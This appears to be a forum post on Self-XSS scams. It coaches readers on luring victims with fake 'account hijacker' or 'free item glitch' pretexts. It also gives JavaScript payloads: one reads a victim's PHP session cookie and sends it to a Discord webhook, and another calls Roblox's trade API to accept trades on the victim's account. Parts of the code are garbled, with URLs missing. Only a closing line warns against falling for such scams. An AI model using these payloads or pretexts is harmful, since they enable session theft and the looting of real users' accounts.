Self XSS, The Epitome of Social Engineering


Some time ago I came across a popular Roblox scam, a screenshot is shown below:

This is a popular case of Self-XSS, where a user pretty much compromises themselves. Sadly the domain has been burned, so we cannot analyze the payload being run by this little stager. What we can do however is write out own malicious payloads. :grimacing:

Self XSS as a lucrative attack

Self-XSS has the same exact benefits of other XSS vectors such as reflected XSS. These benefits include:

  • CSRF bypassing

  • Arbitrary code execution

The only issue with Self-XSS is the fact that it is not reliant on a vulnerable webpage, it’s reliant on a vulnerable person.

Manipulation tactics

As we know, nobody is just going to paste anything in their terminal or search bar unless they have a reason to. Your payload could pose as an account hijacker, or some free item glitch, etc. It all depends on who you are looking to exploit. The most popular “hack” Self-XSS takes for in is Account Hijacking.

As Seen in this Facebook help page, Users run a malicious payload manually thinking it can hijack other accounts. The truth is, they are the ones hijacked.

Building our own payloads

We will be building a simple Self-XSS payload for the following test application (Written in PHP):

$id = session_id();

echo "<h1>Current Session ID: $id</h1>";

// run php -S localhost:8080

Creating 2 different sessions (by opening multiple browser instances, one in incognito and another not), you will get greeted with this:
PHP Session Example


We can now create our malicious payload, all we need to do is grab the PHPSESSID cookie from document.cookies and send a fetch request to our exfiltration destination (a Discord webhook, in this case). Payload below:

let session = document.cookie.split("; ")[1];

    method: "post",
    headers: {
      "Content-Type": "application/json",
    body: JSON.stringify({
      username: 'scary 1337 haxor >:)',
      content: "**`" + session + "`**"

Running this is our victims browser, their PHPSESSID will be hooked, and we will now have access to their account.

Going further

This is already, enough but lets say we want to attack an actual web application Roblox for instance. Well, there’s a few flaws in our current payload.

  • The .ROBLOSECURITY cookie is flagged as HTTPOnly
  • CORS Prevents us from exfiltrating data.

What we can do though, is make requests from to their APIs, which are hosted on their subdomains. This bypasses the Cross Origin Policy due to the requests coming from

Accepting Arbitrary Trades

let tradeId = "ID";

  method: "POST",
  url: `${tradeId}/accept`,
  contentType: "application/json"
  data => console.log(data)
  error => console.log(error.responseJSON.errors[0].message)

Running this on an authorized victims account accepts a trade automatically.


<3 Don’t fall for Self-XSS :skull:


This topic was automatically closed after 121 days. New replies are no longer allowed.